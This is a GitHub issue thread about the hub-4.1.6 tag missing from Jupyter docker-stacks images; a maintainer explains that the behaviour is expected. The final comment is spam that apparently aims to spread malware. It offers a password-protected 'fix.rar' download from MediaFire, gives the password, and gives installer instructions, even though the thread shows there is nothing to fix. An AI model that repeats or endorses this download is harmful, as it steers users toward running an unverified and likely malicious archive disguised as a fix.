### ISSUE TITLE
Missing `hub-4.1.6` tag for JupyterLab images

### ISSUE THREAD

**Issue by jrdnbradford** [jupyter/docker-stacks#2138]
### What docker image(s) are you using?

scipy-notebook

### Host OS system

Ubuntu 22.04

### Host architecture

x86_64

### What Docker command are you running?

`docker pull quay.io/jupyter/scipy-notebook:hub-4.1.6`

### How to Reproduce the problem?

Run `docker pull quay.io/jupyter/scipy-notebook:hub-4.1.6`.

### Actual behavior

The issue is that the tag `hub-4.1.6` appears to have been skipped on most (all?) JupyterLab images on quay.  `hub-4.1.5` and `hub-5.1.0` exist, but  `hub-4.1.6`  does not even though it is released: https://github.com/jupyterhub/jupyterhub/releases/tag/4.1.6

### Latest Docker version

- [X] I've updated my Docker version to the latest available, and the issue persists

**Comment by jrdnbradford** [comment]
Hi @mathbunnyru, thanks for the explanation. I have no issues with getting something up and working with my setup, just thought something was potentially wrong here and wanted to report. The setup makes sense. Thanks!

**Comment by mathbunnyru** [comment]
> Hi @mathbunnyru, thanks for the explanation. I have no issues with getting something up and working with my setup, just thought something was potentially wrong here and wanted to report. The setup makes sense. Thanks!

Thank you for the report, it's better to report, rather than have an issue 👍 
In this case, everything worked as expected 🙂

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
